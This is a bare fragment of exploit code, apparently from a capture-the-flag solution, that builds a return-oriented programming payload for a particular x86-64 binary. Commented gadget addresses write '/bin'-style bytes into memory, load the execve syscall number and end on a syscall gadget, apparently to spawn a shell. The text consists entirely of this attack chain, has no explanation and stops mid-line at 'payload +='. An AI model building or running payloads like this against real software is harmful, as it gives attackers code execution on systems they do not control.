payload = p64(0x4017ca)
#0x00000000004017ca: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret; 
payload += p64(0x6e69622f)+p64(0x4240ad)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4017ca)
# 0x00000000004017ca: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret; 
payload += p64(0x68662f)+p64(0x4240b1)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4147ad)
# 0x00000000004147ad: pop rcx; ret; 
payload += p64(0x20000000000cd003)+p64(0x4017ca)
# 0x00000000004017ca: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret; 
payload += p64(0x42403b)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x41c7d5)
# 0x41c7d5: pop rdx ; mov ah, 0xfe ; dec dword ptr [rbx + rcx*4 + 0x3d] ; retf
payload += p64(0x0)+p32(0x4017d3)+p32(0x33)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x3b)+p64(0x41b098)
# 0x41b098: xchg edi, eax ; retf
payload += p32(0x4017d1)+p32(0x33)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x424070)+p64(0x408a0b)
# 0x0000000000408a0b: syscall; ret; 
payload +=
